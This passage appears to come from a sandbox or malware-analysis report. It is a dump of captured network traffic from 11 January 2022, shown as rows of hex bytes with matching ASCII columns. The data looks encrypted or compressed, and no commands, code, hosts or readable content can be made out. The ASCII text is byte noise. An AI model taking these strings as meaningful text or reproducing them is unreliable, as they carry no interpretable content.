                                                                                                                                  2022-01-11 22:38:26 UTC149INData Raw: 93 fb fe 0a 24 02 28 01 e4 78 06 cb 1f 0c 19 57 c9 51 79 46 3f fb 65 89 c5 4b d1 e0 9d 49 e9 1f 30 4a bb bd 35 93 86 ea 79 38 3b 3c 2a 9d f1 56 60 97 a5 8c b5 62 be c9 b1 48 d5 55 3d b3 7f b3 9b 7c b2 c5 6b 26 3c ac 52 3d be 24 e1 b2 3b e9 dc 8a ea 39 d9 64 95 5e 6d 26 c2 85 1b 3b ed c9 07 37 e5 96 a1 a3 f4 15 18 8f 89 84 12 8a a7 79 90 84 c7 52 bf 11 98 0d 61 5f b8 c8 58 50 77 86 4f 1a 71 6f d4 e1 79 3b 82 48 79 b0 28 7d 6c a4 f3 21 9b 66 2e 70 fc 57 66 25 23 d1 05 6b 69 91 46 a1 d1 e8 40 e9 62 8a 23 c7 ec f6 8c 2d c9 bb 87 d7 a3 72 8d de 92 7a e9 47 9c c9 75 34 b1 d8 0a 2d 68 8e 69 d9 af ee a8 53 b9 fb 7d 3d e7 e4 88 c5 a1 6f 45 7c a0 4b c1 0b 5d fb e6 2f 28 a5 16 7b 95 22 4a 46 02 51 50 4e b4 63 cb a8 30 a3 a2 e7 e5 8d 23 38 d7 f4 72 78 c2 fe 03 ef f6
                                                                                                                                  Data Ascii: $(xWQyF?eKI0J5y8;<*V`bHU=|k&<R=$;9d^m&;7yRa_XPwOqoy;Hy(}l!f.pWf%#kiF@b#-rzGu4-hiS}=oE|K]/({"JFQPNc0#8rx
                                                                                                                                  2022-01-11 22:38:26 UTC153INData Raw: 54 5e be d9 a7 46 93 e8 7c 9f 62 e7 52 c8 79 dc da 33 f7 fd 3e 91 40 ba 2a c7 1d ce 1e b0 49 7e df 3f 44 97 f7 1e f1 b2 11 1b fc 6c 3d ec c0 b7 1d 95 f7 92 f7 4e 8f 0a c4 2a 69 24 a7 6a d6 32 8f b6 9e 0a 1b 64 c3 3f 03 17 97 4c 7f 77 9e 3d 82 01 08 f0 c4 93 ab 7c f3 dc 74 39 6b 4c 33 4f 3f 4b 81 00 e1 1a fe f3 02 29 00 68 b5 d5 ed 33 79 5b b9 dc d7 48 13 75 5c b1 7b d2 ba a1 c1 d9 5d 37 80 df 52 af b1 ea 51 aa 45 ce 6e 47 79 f2 77 58 0f 6a b9 e4 2c 2f ee 35 d7 b0 5a a4 43 fa eb 74 f6 c7 e3 0b 93 80 65 f4 52 4a a0 b5 ea 98 44 98 51 f7 60 eb 25 23 7d 38 c1 dc fb 79 a4 64 7f 68 27 a7 f5 64 b5 a7 ef 95 d8 9e 86 95 0d 58 a8 14 1c 09 86 36 e1 0b 24 76 17 4a 65 5a 9e 01 b0 8a d7 e4 02 70 c3 d7 9c cc 36 b6 5a 02 8f 72 8f 31 de 71 c2 74 1d a5 6e ea 0d 1b 67 aa 80
                                                                                                                                  Data Ascii: T^F|bRy3>@*I~?Dl=N*i$j2d?Lw=|t9kL3O?K)h3y[Hu\{]7RQEnGywXj,/5ZCteRJDQ`%#}8ydh'dX6$vJeZp6Zr1qtng
                                                                                                                                  2022-01-11 22:38:26 UTC157INData Raw: a5 69 95 19 65 15 2d f7 a9 f4 d2 14 ad 1d 81 aa 6c 9c 7b 17 dd 7c 78 a9 51 a5 a6 ad 85 fc 81 75 46 e9 92 04 97 ce 17 a7 6c 2b 51 64 a7 5a 71 bc 45 64 62 86 ad 2f f6 8f 76 56 75 f4 bd 72 94 9a 69 ca a8 9a cc f2 62 0f 30 37 ee d1 9b c3 68 4d b0 e2 b3 a2 81 18 63 07 37 a3 51 ae 7b 44 58 7b a9 0b 31 89 34 e2 35 fe c7 16 69 c2 24 10 32 21 b1 49 3c 79 9b 1b 0c df 9b fe 81 a5 c0 ed c6 5f e2 96 e2 e4 b6 9c e8 8e 24 f8 9f 34 ad 3a 8f cc f8 55 83 b7 09 61 be b2 71 e3 2e d6 9b 7e 8a a2 20 90 58 6d 5a fc 24 5e 48 fb e1 4d 9e 05 51 8a b4 73 29 04 7b ca a0 05 0c 74 7e 37 89 20 fa 7e 23 bc 22 87 35 d3 c8 36 eb f2 fa 54 e1 80 32 29 dc ed de c4 2b ee 12 35 85 2a bc 58 66 f8 7e 99 41 fd 59 58 d8 dc 5c 64 d0 10 21 fe 8d 0f e7 b7 d7 d6 3d e0 95 64 fa b7 08 cc b4 97 f9 4d f8
                                                                                                                                  Data Ascii: ie-l{|xQuFl+QdZqEdb/vVurib07hMc7Q{DX{145i$2!I<y_$4:Uaq.~ XmZ$^HMQs){t~7 ~#"56T2)+5*Xf~AYX\d!=dM
                                                                                                                                  2022-01-11 22:38:26 UTC160INData Raw: fd 12 4e dd 1a 99 5c 40 ff 24 72 62 f8 69 b3 a7 25 e3 30 56 36 40 77 c9 c0 37 3b 13 ce 1f 70 38 41 a4 72 6d 22 51 d9 1c 96 e3 f4 7f ca 30 82 4d 80 84 6c 87 da 0e cb c2 a8 61 c9 56 8a fa 1a 5a e3 87 d2 d0 f0 02 e7 41 fd e5 ed 98 9c 4c 87 b1 3f 21 8d 13 98 13 25 7b b1 2b 2b 7b 87 f0 4e 02 32 47 b0 10 66 f4 be b5 77 8e c8 27 9d 40 c1 b8 54 30 b9 f7 5f 55 4a d7 59 bc bb b8 7b 64 97 7f 47 58 da b6 46 86 9e eb a7 b3 60 7c 72 3f d1 ef 31 08 3f 42 70 b4 fb 6d 60 b0 78 2c e9 df 84 a9 59 59 77 13 b2 60 d9 79 c5 0e 16 8d 20 e6 54 1b 71 91 14 fc 87 fb d0 25 c5 76 7c df cf 6d 69 ed a7 e2 6d f7 40 21 4e c0 c7 09 3c 60 7a 66 84 5e 7d dc e7 90 0d f3 5d 75 22 ef 15 da 5e a2 71 ff d1 76 50 90 81 a1 05 18 8a ab 3d 95 d2 8b 77 74 29 88 5f 3c 4c cd e8 ab 3e cf 21 8f d7 ab e4
                                                                                                                                  Data Ascii: N\@$rbi%0V6@w7;p8Arm"Q0MlaVZAL?!%{++{N2Gfw'@T0_UJY{dGXF`|r?1?Bpm`x,YYw`y Tq%v|mim@!N<`zf^}]u"^qvP=wt)_<L>!
                                                                                                                                  2022-01-11 22:38:26 UTC164INData Raw: a6 5d 06 cc 9c 41 46 43 ed e7 fc 70 60 9e 8f 07 02 01 30 2e 75 7b f6 1c 61 dd 3e 2c d2 31 06 b7 96 f8 76 46 a2 8a f8 0d 2e 1a 57 7d 17 1b 9b 91 d5 fb 8f 66 99 5a 3d 09 fb 36 d7 90 73 ce f4 82 d2 26 be 93 a6 4f cd fa 0d b0 a8 a8 aa 67 9c dd f1 ff 11 2e 33 31 04 a4 b3 b2 cb dc f0 81 36 5d 96 1d dc d9 80 ec 18 36 e0 1f b0 69 a0 6c 3a 26 79 25 e0 e7 cd 0c 8b 47 be 31 e1 d3 aa b6 6b 45 76 68 f1 9e 94 41 b5 2a 23 7b cd 30 2b 96 f9 85 1f 98 fe 04 e1 e8 f5 16 3f 16 e2 12 ed 5d e1 cf 7a f6 33 79 fd 21 70 83 70 fc 9a 49 42 35 7a 95 bf 7c 6e d7 f5 3d 03 8b de a7 c7 61 80 23 29 67 46 41 45 cc d2 ce ed de 24 7b 66 18 94 aa 7d 16 76 d6 1f d0 17 81 2e 99 18 95 85 01 6f 04 53 3a 80 f8 0b d3 29 ce 4d 29 d9 3b c9 f9 ae 00 6a 0f 4f cb 51 6c 5f d9 9f b3 72 a1 1d ea 0a f1 18
                                                                                                                                  Data Ascii: ]AFCp`0.u{a>,1vF.W}fZ=6s&Og.316]6il:&y%G1kEvhA*#{0+?]z3y!ppIB5z|n=a#)gFAE${f}v.oS:)M);jOQl_r
                                                                                                                                  2022-01-11 22:38:26 UTC168INData Raw: b1 94 e3 09 86 b0 cb c3 f2 56 d0 1f 31 b1 76 4c 48 5a 69 02 38 6b 41 4d 8e 55 fc 47 2f b9 62 d7 cd 2b 07 2a 7f 24 59 71 0a 9a 18 e7 c3 3b 5b 60 b7 a9 6f 75 b1 01 c5 18 bf 60 c3 71 a8 64 45 19 57 66 00 f0 8f f2 b6 32 25 4d c4 e8 68 10 c5 5d 7b 56 b3 69 51 02 a9 1e 4c ae e7 59 91 b5 45 c6 70 50 97 99 05 7d d6 87 f8 16 f3 1d f6 23 3b 58 3e 4a f8 a2 fe f1 0d 42 fc 53 c7 26 1c d3 f8 8d 6e 5c 46 eb 6d fb 0d 42 21 16 e0 86 a0 1c 41 83 f6 2c 5a f9 e7 a1 67 f3 16 40 de 02 fe b9 23 ff 3f ea 43 78 42 80 2f 57 45 08 90 9d c2 79 39 8b 87 36 c3 23 b6 78 4a 7a 5a 37 21 35 09 b1 21 e7 3a 83 7f c4 68 91 89 65 1f d8 9a 5c 9d 72 7c f0 a8 58 eb 8f 6e 24 18 50 3d 81 12 4a 26 79 17 9b 0a 75 45 06 73 f1 0e 5f 9f 96 a5 97 6b 2b 2b 52 95 26 0a 96 17 0f c0 e6 f4 58 d3 a7 e0 b9 55
                                                                                                                                  Data Ascii: V1vLHZi8kAMUG/b+*$Yq;[`ou`qdEWf2%Mh]{ViQLYEpP}#;X>JBS&n\FmB!A,Zg@#?CxB/WEy96#xJzZ7!5!:he\r|Xn$P=J&yuEs_k++R&XU
                                                                                                                                  2022-01-11 22:38:26 UTC172INData Raw: 42 1b 92 56 8e b5 bc a7 ac 70 17 4c 0b ba cc 1e 09 20 c3 13 e2 55 4b c0 03 87 e1 53 10 e0 88 ed 89 72 94 6a 27 6a 2a af bb ea 2c ae be b7 06 97 3a 51 bc 1a 69 0f ce 34 97 04 a5 db 40 2c 4f f3 d3 ae 95 05 ef 6c b5 0d c9 82 d6 85 4e 6f 39 a2 b1 25 81 e5 30 4d 0b f4 02 70 25 15 2a 83 9b 90 fb 0e 59 c7 8b ec 1a 3a 1c 29 cd 34 a0 8c eb 2c a0 61 38 9d 9b ae b8 a8 0a 25 7d 0e 30 2a fc 35 cc 40 fd d5 27 7b 1e ed b3 3c a4 bc c6 d0 15 16 f0 69 b9 01 97 1d 5c 06 89 f8 a0 2f 46 2b 0c 3f da 31 e9 f2 06 db 85 2a 7c 87 f0 52 65 f2 9d cb 66 c4 7a 04 3e 39 2a 4b 41 9c 97 8a 87 f6 e1 24 80 4f 1e bb 57 cd b0 b2 11 a7 a0 91 9c 22 b6 ca 94 a6 40 63 40 ca 5f 32 26 5c 93 fa 8c 97 1a d7 c3 70 b7 e4 dd 9b ee 5a 9d e0 ef 86 49 19 7e 89 ac df 2a c2 cd 45 ed 77 a8 9b ae 87 82 7c db
                                                                                                                                  Data Ascii: BVpL UKSrj'j*,:Qi4@,OlNo9%0Mp%*Y:)4,a8%}0*5@'{<i\/F+?1*|Refz>9*KA$OW"@c@_2&\pZI~*Ew|
                                                                                                                                  2022-01-11 22:38:26 UTC177INData Raw: 2a 40 70 cf 0a 1a 42 fa 14 07 53 d1 53 c6 36 91 c2 c5 42 27 d0 b6 91 95 63 8a de 68 f7 bc 77 9a 02 7f 5b ad 24 e5 0a 9c 55 23 e6 96 ab 4e 5d f4 a6 68 99 d3 5b b2 e2 2e ad 1a 8f 28 be ad d5 32 b6 1a c3 e1 91 a6 aa cd ab 8c 2c 5c 61 56 ef 76 b4 af 95 89 8e e4 07 f8 ac cc a0 9c bd 8d 30 5c d7 77 e8 39 fb 78 0b d6 91 75 48 17 95 42 64 ce 07 85 2a 79 0d d2 6b 26 57 53 a1 9f 7b 6f a2 4c 5c e7 ea a9 80 16 29 36 4c 50 5d 04 41 76 9b 50 6d 74 52 d7 74 af c4 16 03 83 98 f6 55 62 fd 1a 02 43 f2 33 50 4a 07 9a e4 5a c7 60 f9 d1 57 d3 0e 85 6c 00 f8 28 d1 f0 b6 f2 32 04 b1 be c7 f8 d6 f5 46 73 5d 8f 42 02 2a 08 c7 55 4e 51 99 b1 f6 f9 69 c4 f7 5e 22 07 d3 ee d4 0b a3 9f 41 00 0a cc 0a f2 f0 bf a9 de f6 1a 3f 9e 45 69 0d 10 b2 15 5f e2 b3 44 7e e8 5e 6a 05 d3 d6 e7 16
                                                                                                                                  Data Ascii: *@pBSS6B'chw[$U#N]h[.(2,\aVv0\w9xuHBd*yk&WS{oL\)6LP]AvPmtRtUbC3PJZ`Wl(2Fs]B*UNQi^"A?Ei_D~^j
                                                                                                                                  2022-01-11 22:38:26 UTC181INData Raw: cf 24 2d 8a ab ce 73 72 75 8f 3e a9 57 48 54 61 79 bc 59 45 26 e5 47 01 24 29 f9 24 e9 40 1c 31 f3 24 9a d4 5b 8f 34 27 5f a9 9b c0 18 43 27 bd 1d 6a cf 32 b4 1d 9e 0d 38 fb 51 db 8d 93 ff 02 42 e4 c8 50 93 58 4a e5 52 4c b2 dc c4 64 4c 16 49 66 cb a7 e2 b0 ee db d8 34 99 3a 14 b9 59 6a 4b 19 cd 70 94 6a 53 eb e2 78 b8 da 9e ab 6c 74 58 ed ca 7d 5e 67 7c 3d db 74 e1 69 d3 f5 d9 76 0f 93 bd f0 1a 04 05 37 69 4b 87 cb 95 cd ce d8 7a c3 09 94 d1 ef 89 a7 4f ce f6 49 03 59 f5 58 27 30 c3 b0 e8 ec c1 70 c5 6f db 6e 0f b9 fc bb 14 76 99 60 3f 44 69 f4 43 5f d5 60 87 73 6c 39 ba 89 f1 b3 03 1c e7 1c ab cd b6 1a 5f 3b 05 c4 0c a2 71 94 3b e2 fd c2 8c fc 48 fb f2 92 dd 4c 5e 39 b6 32 6c 69 3b a8 6c 1d bb d2 24 ce 45 8a d5 c2 26 0d e8 76 ed 81 91 5d 72 b5 6f 47 29
                                                                                                                                  Data Ascii: $-sru>WHTayYE&G$)$@1$[4'_C'j28QBPXJRLdLIf4:YjKpjSxltX}^g|=tiv7iKzOIYX'0ponv`?DiC_`sl9_;q;HL^92li;l$E&v]roG)
                                                                                                                                  2022-01-11 22:38:26 UTC185INData Raw: 82 b5 de 29 63 1e 9d f7 5b 87 3d 56 b0 96 5c 3b b8 8e 04 d3 75 d8 b4 f7 4d ad 9c e4 32 58 28 42 e8 b1 2c b9 7f a9 de 1b ca a8 d6 fa 50 fc dc 2b 5b ca 52 fd 40 ba 67 37 df 9a 0d f9 14 40 68 db 7a 5c b5 bf 12 af 92 e6 d5 d3 dc 01 83 56 18 60 08 f5 f7 34 7c f8 c8 11 bb da 4c 33 f3 1b 4f 81 43 51 6f 95 93 33 f4 98 58 58 36 dd 44 e4 55 fe a0 82 ab 1e a7 c7 84 5a 0b 8a 68 90 77 fe 14 53 29 78 b2 9e bb 83 2b f5 57 b6 0c d0 42 a3 95 24 ca da 7b de 11 dc 32 d2 b1 93 e7 e3 61 87 d0 fc 99 b8 8f 77 1d 24 29 5c 4e c5 86 64 e4 8f 41 73 8d 65 79 67 64 72 e6 0c 6b a0 26 ea b8 d0 7e b7 e9 0f 82 f5 51 58 e7 cc 59 ce 66 b5 ae 6d 72 72 45 1f 73 41 fe e9 63 3a d2 46 22 3f e6 c9 1c 94 36 fc a0 95 46 17 af c3 84 f5 53 78 9f 38 41 8c 54 f4 c8 c4 aa 0c a0 2e 53 4a 69 71 13 b9 b6
                                                                                                                                  Data Ascii: )c[=V\;uM2X(B,P+[R@g7@hz\V`4|L3OCQo3XX6DUZhwS)x+WB${2aw$)\NdAseygdrk&~QXYfmrrEsAc:F"?6FSx8AT.SJiq
                                                                                                                                  2022-01-11 22:38:26 UTC189INData Raw: 14 e7 74 5f 78 4c f3 92 e5 55 9b e3 cb dd e3 85 8e b6 dd 2b 6a c8 77 11 54 2d 26 75 c6 e9 62 4d be 63 ab e0 c1 43 29 f1 2b ef b6 e2 13 33 1b 0a d6 80 b2 a1 4f 97 02 3d 66 db 86 65 5e d6 7e d3 ce 63 69 4d 47 4c ce ba 52 55 8e 19 52 9c df 65 dc 56 be 95 25 e4 4d d6 8c 7b d3 90 7c d0 c4 da 4a a0 cc 7f 63 28 ad 8f 55 b1 f8 9a 70 6b 35 22 13 ae 8e 04 e9 d1 9e 92 84 c5 18 08 bf 4e 22 56 c0 49 54 55 2d eb 06 39 fc d5 58 fe 35 7b 93 36 ca 86 0f e2 81 f5 9d 8a 81 e8 38 c1 ca f4 d1 0a a9 36 a7 2a e9 06 b3 fd c0 95 0f 96 4d 12 fc d1 f9 e6 bf 17 18 17 cc 29 7a 3f 09 c5 12 8b 3e 6b 8c 98 5f f4 f9 f1 29 f5 21 02 8a a8 a4 4e 0f c9 37 bf 45 5e ee 96 c2 e4 b7 b2 7c 06 79 c3 8a 91 6e 35 ba 93 f7 df 57 65 53 a8 73 4a a9 35 45 7c b0 56 36 a3 82 18 c0 76 9b 62 0a 09 85 34 8a
                                                                                                                                  Data Ascii: t_xLU+jwT-&ubMcC)+3O=fe^~ciMGLRUReV%M{|Jc(Upk5"N"VITU-9X5{686*M)z?>k_)!N7E^|yn5WeSsJ5E|V6vb4
                                                                                                                                  2022-01-11 22:38:26 UTC192INData Raw: cd 5d 5b 4b 14 2a 19 4c cc a3 2e 5f c1 6a c2 eb 84 06 5b 49 67 cb 08 ed 08 5a f9 56 9a 91 52 d7 d1 99 67 50 29 fc b5 d4 65 be 04 92 cf a2 2e 13 73 d9 71 9f 65 6e ad c9 f8 45 54 fa ee 21 58 5d 15 6b 61 cf 03 7d 66 c6 a6 66 df d5 29 92 d6 b1 69 65 a2 79 18 98 4c 0d e0 b4 b4 c9 2e 56 02 1d d7 bd 73 ab d1 d1 45 81 5f dc 3f 46 00 cc 68 13 54 e2 96 72 0b c2 db 99 17 29 f0 ad c7 3e 1c 54 ef e7 25 51 c2 30 1d 1e cb d4 c7 9f 75 41 7a c1 2f fe a2 ac 6c 86 7b b7 d5 5a 05 74 13 1f d3 60 11 6c 29 b0 c8 38 b8 05 6f b4 d2 53 a1 a1 37 96 ef 5b ef f6 74 ff 9b 18 30 79 a3 81 23 86 ee 83 84 b9 12 20 69 02 3d 9a 55 4f dd cd 5c 33 fb f2 14 55 e9 4e c3 8a 14 d8 22 cc c6 54 cb c4 a6 e9 c6 f9 24 32 a5 f7 1d 97 db af b2 9e 32 ce 39 01 34 4d 98 e9 78 35 67 67 f9 f6 83 65 a4 03 5f
                                                                                                                                  Data Ascii: ][K*L._j[IgZVRgP)e.sqenET!X]ka}ff)ieyL.VsE_?FhTr)>T%Q0uAz/l{Zt`l)8oS7[t0y# i=UO\3UN"T$2294Mx5gge_
                                                                                                                                  2022-01-11 22:38:26 UTC196INData Raw: ac 97 3b c8 ce 46 b7 2d fd 09 ee 7d 64 e8 18 2a fe 1e 49 00 22 45 7f 6c 83 e3 a8 cb f1 99 b8 48 26 99 d7 75 b2 bb 51 f0 ac 95 6d e5 96 69 da 4b 47 99 3e b2 a2 a2 ba 54 5b 30 a7 3a 39 3b 3a ad b8 9d d2 0c 75 9d 90 b6 48 03 35 b3 dd d0 ba 03 69 60 16 ae 42 e6 45 26 af 76 b7 80 b5 d8 68 c4 e7 33 94 83 5c ec 18 e0 c6 c2 9c 6d 91 91 bc 42 8f 0c bd b0 9f df c7 29 db 7e e4 43 a3 56 53 bf 7a 69 0b 2a b8 d1 c5 64 4e 60 77 f5 e6 91 f9 4d 57 85 1c 2c a7 4c 9f 47 9a c0 07 46 f8 ac f2 49 d7 5d 83 f7 1e 89 c8 32 e8 3a 77 64 57 09 ea 5b 7b f7 0b 3a b8 26 27 a0 ad 12 8f a1 52 22 46 ae 60 4d 74 9b f2 f6 c8 4c 5b 16 f7 7f 65 3e f4 4f 71 58 e3 ec da 8d 8f 97 d3 cd 2f b4 29 31 c3 91 f1 32 3e 75 68 88 e0 44 a5 13 93 67 f9 55 11 62 f4 5b e2 4d ba d5 ad 53 02 cb 71 25 30 b7 99
                                                                                                                                  Data Ascii: ;F-}d*I"ElH&uQmiKG>T[0:9;:uH5i`BE&vh3\mB)~CVSzi*dN`wMW,LGFI]2:wdW[{:&'R"F`MtL[e>OqX/)12>uhDgUb[MSq%0
                                                                                                                                  2022-01-11 22:38:26 UTC200INData Raw: 20 dd 5b a1 5f 32 51 ef 11 b1 d7 8a fd 70 d9 10 09 17 c4 a8 d1 9d b8 3b 0b 0a 5f 2d 0c c1 a9 07 bd b2 1a bf 02 8a e7 c9 71 27 b8 f8 53 17 e0 e9 7e eb 8b 13 e7 2c 9c d2 90 17 8a 5a da ef cc 11 60 7e 0a 66 47 fb 9c 37 2b 50 bc 73 59 d9 83 c0 85 4f 79 b8 b0 5f b1 15 db 15 5f e0 34 a0 d2 1f 40 9a 44 28 e7 a1 5e 3f f3 38 33 e3 c8 6b cf 39 05 bc b6 04 44 2d 56 aa ed 1d ef 2a 5f f6 af 54 ba 37 02 b7 53 bb 2f 47 3b c5 1c a0 7d df a0 51 ef da 4b 08 39 5e ed 08 37 19 73 fa 78 ba 4c a1 ee 4b fc b2 a0 8f 22 3e 6a 18 c1 24 30 37 d7 4d a6 5c 43 53 88 6e 98 e4 53 b7 94 49 02 f1 95 80 4f 99 cc 1b 6a 05 a8 60 1f 60 70 53 b9 24 7c 79 d9 85 7f 51 f2 ac e6 70 08 6e e8 42 09 3a 7a 2d 40 0c 1e 98 03 2e 5c a9 67 90 9b 26 e1 3b 08 10 4e c1 2d ad 0f 96 bd 6e 82 b6 be ae 91 1e 9c
                                                                                                                                  Data Ascii: [_2Qp;_-q'S~,Z`~fG7+PsYOy__4@D(^?83k9D-V*_T7S/G;}QK9^7sxLK">j$07M\CSnSIOj``pS$|yQpnB:z-@.\g&;N-n
                                                                                                                                  2022-01-11 22:38:26 UTC204INData Raw: 00 64 af 1b 6c 3c e3 28 79 3f 63 da 6b b0 93 5d f8 f6 3c af 67 af 89 2e f2 23 aa ef 69 f5 43 f4 48 15 59 30 8b ef f4 ea f5 94 47 7c 4d 3d 5b 54 40 d7 70 9d b4 06 d5 d1 7c 79 4c 44 07 bd e2 66 e5 11 f2 af 49 c3 86 89 0d 20 82 02 a0 da 43 dd 1f 95 ca a7 41 0c 0c 2c be 6f de 77 26 2f e7 ec 00 28 fd 9a db 79 d1 2d 10 7a 46 ea cc 04 11 21 b0 d9 16 d9 4f ff 3a be e2 e9 ce a1 f0 d5 c5 c6 45 f3 a2 45 20 a5 e5 c7 c8 5f 1f 18 c3 94 49 51 a4 7f 9a 3c 33 7d ee 46 8a f8 a4 46 15 c5 97 24 9b 87 61 76 fa 7a fd 5a a2 82 5a 94 54 d3 5c ac bb 06 fe 5f eb c3 c1 87 f6 ea ab a5 af 5d 7b 11 fe 59 09 5d 75 9f 8d ac 6b 52 0e 58 41 d5 c2 84 3a d3 49 63 07 d3 22 ac 6c 06 49 a9 7e 58 e2 21 07 24 0c b6 d6 7f 39 99 30 b9 c3 85 13 ff 71 e2 e1 3e cb 1e 81 8c 3b 51 8a 5d dc 39 ad c4 60
                                                                                                                                  Data Ascii: dl<(y?ck]<g.#iCHY0G|M=[T@p|yLDfI CA,ow&/(y-zF!O:EE _IQ<3}FF$avzZZT\_]{Y]ukRXA:Ic"lI~X!$90q>;Q]9`
                                                                                                                                  2022-01-11 22:38:26 UTC209INData Raw: aa 04 2f 9f c0 d5 62 ad b0 fb 08 88 d8 78 5c d8 e7 49 14 66 5c 85 93 f2 d5 62 c4 91 a5 d1 4a 01 81 b5 19 92 ba 97 d9 0e 28 99 90 b9 53 ea f3 25 68 6f ba b8 ae e0 b8 bc cb d7 c2 e3 f8 43 c1 a4 5e c2 e5 93 79 49 c4 aa 4d 58 1c a2 2e 75 ff 8e cf 22 59 cd 89 20 31 cf 52 51 f8 1e 27 1a c8 d9 ef 59 0a 4f 54 09 f5 9f 10 9c 13 49 93 6e fc b1 d3 7b 99 6d fd bb ff 54 19 40 46 a7 80 40 6f b1 e4 08 31 33 fa de 06 c5 c1 dc 1d 2a 65 3a d0 59 a6 64 26 d9 a5 81 e7 c0 48 63 59 57 74 ca 82 a7 cc 37 18 ff 9d 05 82 80 c6 2f 69 82 de 76 6a 9e 9b b3 54 d5 70 c1 fc f5 58 3b 91 9e 01 97 18 89 30 97 8e 2d 3c 91 d6 12 1f be c0 de 77 5a 85 0c 2f 94 c0 96 4b 45 96 aa c5 47 97 37 90 bb bc 7f 9b 9b 7f 06 e9 e2 b6 59 f5 86 24 50 c6 3c 8f af cd 97 09 a7 b4 61 f1 3a b8 21 96 32 c8 cc fc
                                                                                                                                  Data Ascii: /bx\If\bJ(S%hoC^yIMX.u"Y 1RQ'YOTIn{mT@F@o13*e:Yd&HcYWt7/ivjTpX;0-<wZ/KEG7Y$P<a:!2
                                                                                                                                  2022-01-11 22:38:26 UTC213INData Raw: b3 a0 32 7a cb 39 81 c1 7f 82 87 8d 17 f3 05 2a 2c 50 30 6f 73 68 2b 2b aa 95 23 40 4b b5 35 ce c4 1f 36 99 cc a1 49 bc 2f b3 c3 2d f2 5d 38 a0 ed a7 a4 5b 69 c8 c7 5f 28 28 0b aa 29 a6 65 fb 31 1e 5b 2e 44 b9 06 23 7b aa 73 f6 66 07 20 3c 2e d7 00 87 e9 3f ea b2 a5 7d fe 00 a9 2b f6 c4 69 40 42 00 85 11 4d de 56 8d 05 95 2c 60 99 3b 40 58 14 78 a5 fc 81 1d 96 e0 4a d3 86 e8 47 45 81 0e ac 65 3e 4c 2f d3 01 d9 56 f8 84 6e ed ee 34 6f 6c 86 40 a8 8a 25 82 8f af 9f c9 e9 97 a0 34 b9 22 a5 e4 ed 55 11 15 87 8a 31 91 27 73 78 00 6c f1 6a 97 f2 5d 92 2b 6e 41 21 8a fd 43 12 01 92 d4 09 b2 86 98 76 ef d8 57 fe 49 a7 8f e0 32 84 08 01 bd 20 eb 87 65 5c e8 18 9c 29 74 bc 75 f2 15 d5 40 42 9b ad fb 9a d3 ec 8f 81 d2 1d 98 3d 89 51 7b cc 87 24 b3 29 c0 17 d0 ce 24
                                                                                                                                  Data Ascii: 2z9*,P0osh++#@K56I/-]8[i_(()e1[.D#{sf <.?}+i@BMV,`;@XxJGEe>L/Vn4ol@%4"U1'sxlj]+nA!CvWI2 e\)tu@B=Q{$)$
                                                                                                                                  2022-01-11 22:38:26 UTC229INData Raw: b4 be 51 1a 01 e7 f8 8a d6 37 f2 cb 3f 6f 1b 4e 71 af 2e fb f0 7c fb 9c 2a 42 1f 08 c2 c2 e2 45 b4 2e 8b 14 9c 10 9d 88 6c b5 09 8c 79 5f e3 4e 25 e9 19 62 9c 61 dc 3c ff 73 d5 26 d4 a6 2e 81 1b d3 e9 e6 f2 e7 63 8b 20 e1 8a 1f fc 83 fc 6d d4 3c 4e 85 2e 5a c0 7f f9 53 f1 a7 a3 cf d1 2d 77 d4 5a 18 7c bd d4 6c 53 19 8d d6 ab e3 af 11 72 be 93 91 32 98 ec 6a 15 73 7e 99 52 bf 05 ca 6a 7b 7d eb bb 7e 7c e9 35 8c 09 84 c8 40 9c a4 5a 7d 99 23 87 39 6a 35 d5 a8 c0 d6 cb 9d a4 36 2f 17 60 7f 32 88 42 43 21 d9 9e 64 34 07 e2 40 47 f4 7e 53 8c 50 ec bc 89 ea 86 21 d7 b6 ac 5e e7 07 8a 6d 8f ed 5c 23 bb 34 d5 f0 92 68 8c 8a 79 a6 0b fe 8f aa cc ab 02 25 44 ef 00 ae 6a 14 27 09 ca 2f 6f 33 51 26 b3 7c 44 1c b9 eb e5 a5 ea 61 55 09 4a fd 36 4a 9f c8 ee c0 25 a2 4d
                                                                                                                                  Data Ascii: Q7?oNq.|*BE.ly_N%ba<s&.c m<N.ZS-wZ|lSr2js~Rj{}~|5@Z}#9j56/`2BC!d4@G~SP!^m\#4hy%Dj'/o3Q&|DaUJ6J%M
                                                                                                                                  2022-01-11 22:38:26 UTC236INData Raw: a4 e7 db 71 8f 20 ff 1f 14 90 c9 c6 a3 67 4f 1e 2b d0 aa 00 9e ae 2d 59 3a a3 33 a2 68 ba b6 b1 32 66 88 3c 57 25 87 e2 46 de 50 8f c3 e1 b2 64 62 54 02 d1 c3 d4 ec 76 fe ab d3 e4 28 f3 86 2b b4 2a 03 6c e5 5a a4 ce 75 1c 25 ee 43 a1 35 30 77 8d b8 a2 cf 4a b8 16 6a f6 31 74 2e 5b 40 07 2e 3f 1e 5f 59 c4 91 20 8c 8b 3e c6 95 91 38 b1 05 37 b6 85 04 35 72 d9 0e 1e 32 94 45 35 42 48 2a 7a 75 44 63 2a 46 03 74 31 bf 5f 1f f5 12 84 24 4e 69 0e 7f 0e 35 3b 64 01 1d f0 b5 fe 39 3c ea f6 d3 b8 df 1b 67 ae 61 1d f3 8e bc 36 99 3a 8e 9c ca 52 b7 fd 4b 10 e2 9c 14 62 15 3e cb ec 9e d3 0c e6 52 34 0e 26 ce 79 de e9 59 96 a7 99 3e a1 e6 14 15 57 1e cb e0 af df be 4e b6 ee 26 68 40 ee fd d7 84 90 97 ff e7 9a 42 4e ed 7a 91 38 87 2d 30 28 86 2d 23 7e bc 55 af 6f ce ed
                                                                                                                                  Data Ascii: q gO+-Y:3h2f<W%FPdbTv(+*lZu%C50wJj1t.[@.?_Y >875r2E5BH*zuDc*Ft1_$Ni5;d9<ga6:RKb>R4&yY>WN&h@BNz8-0(-#~Uo
